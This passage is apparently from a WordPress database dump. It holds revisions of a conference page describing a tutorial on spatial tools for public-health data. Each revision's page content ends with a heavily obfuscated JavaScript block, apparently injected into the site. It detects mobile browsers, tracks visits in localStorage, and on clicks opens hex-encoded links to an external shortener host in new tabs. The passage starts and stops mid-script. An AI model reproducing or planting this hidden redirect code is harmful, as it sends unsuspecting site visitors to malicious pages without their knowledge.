|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-revision-v1','','','2023-02-02 07:29:50','2023-02-02 07:29:50','',3670,'https://gsw2023.com/?p=3684',0,'revision','',0),
(3685,1,'2023-02-02 07:45:08','2023-02-02 07:45:08','','tutm2','','inherit','open','closed','','tutm2','','','2023-02-02 07:45:08','2023-02-02 07:45:08','',3681,'https://gsw2023.com/wp-content/uploads/2023/02/tutm2.jpg',0,'attachment','image/jpeg',0),
(3686,1,'2023-02-02 07:45:35','2023-02-02 07:45:35','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Topic</h5>\n<h6>The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</h6>\n<h6>In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Public Health Data Handling, Analysis and Visualisation using Spatial Science','','inherit','closed','closed','','3681-revision-v1','','','2023-02-02 07:45:35','2023-02-02 07:45:35','',3681,'https://gsw2023.com/?p=3686',0,'revision','',0),
(3687,1,'2023-02-02 07:47:02','2023-02-02 07:47:02','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3685\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Topic</h5>\n<h6>The past century has seen an unprecedented burden of infectious, chronic and vector-borne diseases that threaten the public and global health. There are also direct implications on wildlife populations. Understanding the spatial processes and temporal dynamics are important for guiding policy informed decisions. Policymakers, public health officials, and academic researchers are key stakeholders in the fight against diseases. For instance, the recent COVID-19 pandemic has generated tremendous amount of data which is of prime importance. The availability of spatial tools with analytical &amp; visualization capability provided meaningful insights in handling public health data for scientific understanding of disease trends and patterns. Hence, there is a clear need of simple one-stop solution that is backed by reliable data source.</h6>\n<h6>In this tutorial, we focus on techniques and spatial tools for (i) optimal data collection on disease occurrence and surveillance through citizen-centric approach, (ii) machine learning based statistical modelling tools for active surveillance, and (iii) analysing the spatial complexity of diseases through visualization support.</h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 